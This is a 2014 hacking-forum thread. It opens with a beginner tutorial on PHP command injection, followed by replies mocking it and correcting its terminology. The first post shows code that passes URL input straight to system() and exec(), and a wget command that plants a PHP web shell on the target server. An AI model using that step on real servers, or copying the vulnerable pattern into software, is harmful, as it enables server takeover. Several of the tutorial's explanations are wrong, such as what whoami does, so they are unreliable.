chevron_left chevron_right
Login Register invert_colors photo_library
Thread Rating:
  • 0 Vote(s) - 0 Average


filter_list Tutorial [Concept] RCE [Remote Command Execution]
Author
Message
[Concept] RCE [Remote Command Execution] #1
This is DEDICATED to some guy that Diss Offended me .


What is Remote Code Execution (RCE) :

RCE Is a vulnerability that affects PHP $GET Variable , As most of us know , If the scripter uses a $_GET Variable into his code It means that the url will actually get formatted as the user asks for,As the informations sent by the webserver will be visible to any one in the url , Example :

Code:
http://www.site.com/index.php?id=1

That's a simple example of what $_GET PHP Variable does .


How Does Remote Code Execution affect a script :


Code:
<?php
$command=$_GET['command'];
system($command);
?>

That was a simple PHP script that has the RCE exploit flaw , It's pretty obvious to any PHP scripter how the script works , But I'll explain it ,

Firstly we assign the variable $command to the $_GET Variable and give it a parameter " command " , Then the $command variable is being used as a parameter into the system(); , So that the user will be able to execute any thing via the $_GETVariable into the system(); Which is pretty vulnerable to be exploited easily .

So If we get to use the script some how , Our url will look like :


Code:
somepage.php?command=whatever

In our case It'll be pretty easy to exploit it as the command parameter passes through the system(); function , So any thing that the user add after the "command=" will go through the system(); function , So a simple knowledge with Linux commands will get your pass through to success .

Another simple example :

Code:
<?php
$command=$_GET['command'];
echo exec($command);
?>

This case is apparentley the same as the above one , In this case it just uses the exec(); function instead of the system(); function to get the user's insertion into a shell command .

Exploitation

Let's try exploiting it by running simple linux commands to the url parameter " command= " , For example :

Code:
whoami <--- Reads the Internet socket to show if you have the privileges of root or not , As it will just tell you that you only have the privileges of Apache , If you are root , It will tell you that you're root
uid <--- Fetchs you'r ID

That was just some simple Linux commands that usually every one uses .
By useing any of them on the URL like this :


Code:
somepage.php?command=UNIX command

Results :

Code:
Linux www.***.org 2.6.9-34.ELsmp #1 SMP Fri Feb 24 16:54:53 EST 2006 i686

Now It'll show you the kernel version / Hostname etc..

Now To managely exploit this you will have to use the wget to get a shell spawned into the webserver .
To do this you'll need to use the famous wget() wget() can be used to download a various files into a control gained server , For example


Code:
wget http://www.site.com/shell.txt -O shell.php

What this command does that it gets you'r shell.txt (source code of you'r php shell) downloaded then renamed by the "-O" Option to shell.php to allow you'r php shell to be executable .

There's more than those 2 ways of finding RCE Exploits in a PHP script , I might write some other tutorials about them .
This isn't much .
Excuse me If the tutorial wasn't good enough , But expect way better tutorials in the next time ,

Best regards ,
Z0le

Reply

RE: [Concept] RCE [Remote Command Execution] #2
m8, i don't know what you're trying to prove
Unleash the lead from my pistol into my head bumpin' crystal

Reply

RE: [Concept] RCE [Remote Command Execution] #3
(05-13-2014, 11:30 PM)Kosaki Wrote: m8, i don't know what you're trying to prove

I'm trying to prove that copy&pasting doesn't always make you a skid like what other underdeveloped people are trying to prove .

Reply

RE: [Concept] RCE [Remote Command Execution] #4
Wow.

Who would have thought that supplying input to system() would give you command execution. Some fascinating stuff here.

Reply

RE: [Concept] RCE [Remote Command Execution] #5
(05-13-2014, 11:42 PM)Dyme Wrote: Wow.

Who would have thought that supplying input to system() would give you command execution. Some fascinating stuff here.

[Concept] <== Does it's job in the header.

Reply

RE: [Concept] RCE [Remote Command Execution] #6
(05-13-2014, 11:42 PM)Dyme Wrote: Wow.

Who would have thought that supplying input to system() would give you command execution. Some fascinating stuff here.

lmfaoooooo
XMPP - wrath@xmpp.jp

Reply

RE: [Concept] RCE [Remote Command Execution] #7
This just in, if you let a user provide a command to run, the user can run a command.

That isn't even what RCE stands for. Remote Code Execution
micrictor@creep.im

Reply

RE: [Concept] RCE [Remote Command Execution] #8
(05-14-2014, 12:20 AM)w00t Wrote: This just in, if you let a user provide a command to run, the user can run a command.

That isn't even what RCE stands for. Remote Code Execution
RCE has two meanings , Remote Command Execution(executing commands to the server) which is what I just mentioned above and Remote Code Execution (Which is by using file protocols that may lead to reading an arbitary file , etc ...) which I posted a tutorial about then deleted it , I'm capable of re-sending it to you if you want .

Reply

RE: [Concept] RCE [Remote Command Execution] #9
wasn't this sort of obvious? I mean, if you're executing a command thats supplied through the URL you're instantly vulnerable.... I thought only potatos did that....

Reply

RE: [Concept] RCE [Remote Command Execution] #10
(05-14-2014, 12:27 AM)Z0le Wrote: RCE has two meanings , Remote Command Execution(executing commands to the server) which is what I just mentioned above and Remote Code Execution (Which is by using file protocols that may lead to reading an arbitary file , etc ...) which I posted a tutorial about then deleted it , I'm capable of re-sending it to you if you want .

Not wanting to piss on the time/effort you took to write this up...
but you may want to hold off re-sending anything before you can argue the difference between the two....
(I want you to re-read the quote above)

https://www.owasp.org/index.php/Command_Injection
https://www.owasp.org/index.php/Code_Injection

Also fix the terminology in your tutorial

(05-13-2014, 11:28 PM)Z0le Wrote: [Concept] RCE [Remote Command Execution]

(05-13-2014, 11:28 PM)Z0le Wrote: How Does Remote Code Execution affect a script :

Reply






Users browsing this thread: 1 Guest(s)